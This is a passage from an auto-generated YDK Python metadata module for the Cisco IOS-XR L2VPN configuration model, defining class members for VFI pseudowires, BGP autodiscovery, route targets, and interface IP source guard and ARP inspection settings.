_MetaInfoClassMember('pseudowire-static-mac-addresses', REFERENCE_CLASS, 'PseudowireStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'pseudowire_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'vfi_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-dhcp-snoop', REFERENCE_CLASS, 'VfiPwDhcpSnoop' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop',
[], [],
''' Attach a DHCP Snooping profile
''',
'vfi_pw_dhcp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'vfi_pw_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a MLD Snooping profile
''',
'vfi_pw_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-mpls-static-labels', REFERENCE_CLASS, 'VfiPwMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'vfi_pw_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires',
False,
[
_MetaInfoClassMember('vfi-pseudowire', REFERENCE_LIST, 'VfiPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire',
[], [],
''' Pseudowire configuration
''',
'vfi_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address-index', ATTRIBUTE, 'int' , None, None,
[('0', '32767')], [],
''' Address index
''',
'address_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' Two byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS index
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'LdpVplsIdEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LdpVplsIdEnum',
[], [],
''' VPLS-ID Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vplsid',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable LDP as Signaling Protocol
.Deletion of this object also causes
deletion of all objects under
LDPSignalingProtocol.
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vplsid', REFERENCE_CLASS, 'Vplsid' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid',
[], [],
''' VPLS ID
''',
'vplsid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ldp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy',
False,
[
_MetaInfoClassMember('export', ATTRIBUTE, 'str' , None, None,
[], [],
''' Export route policy
''',
'export',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-route-policy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable BGP as Signaling Protocol
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ve-range', ATTRIBUTE, 'int' , None, None,
[('11', '100')], [],
''' Local Virtual Edge Block Configurable
Range
''',
've_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('veid', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Local Virtual Edge Identifier
''',
'veid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
''' Role of the router target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets',
False,
[
_MetaInfoClassMember('route-target', REFERENCE_LIST, 'RouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget',
[], [],
''' Name of the Route Target
''',
'route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery',
False,
[
_MetaInfoClassMember('ad-control-word', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable control-word for this VFI
''',
'ad_control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bgp-route-policy', REFERENCE_CLASS, 'BgpRoutePolicy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy',
[], [],
''' Route policy
''',
'bgp_route_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bgp-signaling-protocol', REFERENCE_CLASS, 'BgpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol',
[], [],
''' Enable Signaling Protocol BGP in this
VFI
''',
'bgp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ldp-signaling-protocol', REFERENCE_CLASS, 'LdpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol',
[], [],
''' Signaling Protocol LDP in this VFI
configuration
''',
'ldp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-distinguisher', REFERENCE_CLASS, 'RouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-targets', REFERENCE_CLASS, 'RouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets',
[], [],
''' Route Target
''',
'route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('table-policy', ATTRIBUTE, 'str' , None, None,
[], [],
''' Table Policy for installation of
forwarding data to L2FIB
''',
'table_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the Virtual Forwarding Interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bgp-auto-discovery', REFERENCE_CLASS, 'BgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in this VFI
''',
'bgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('multicast-p2mp', REFERENCE_CLASS, 'MulticastP2Mp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp',
[], [],
''' Enable Multicast P2MP in this VFI
''',
'multicast_p2mp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pseudowires', REFERENCE_CLASS, 'VfiPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires',
[], [],
''' List of pseudowires
''',
'vfi_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enabling Shutdown
''',
'vfi_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vpnid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' VPN Identifier
''',
'vpnid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis',
False,
[
_MetaInfoClassMember('vfi', REFERENCE_LIST, 'Vfi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi',
[], [],
''' Name of the Virtual Forwarding Interface
''',
'vfi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface Dynamic IP source
guard
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Address Validation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface Dynamic ARP
Inspection
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
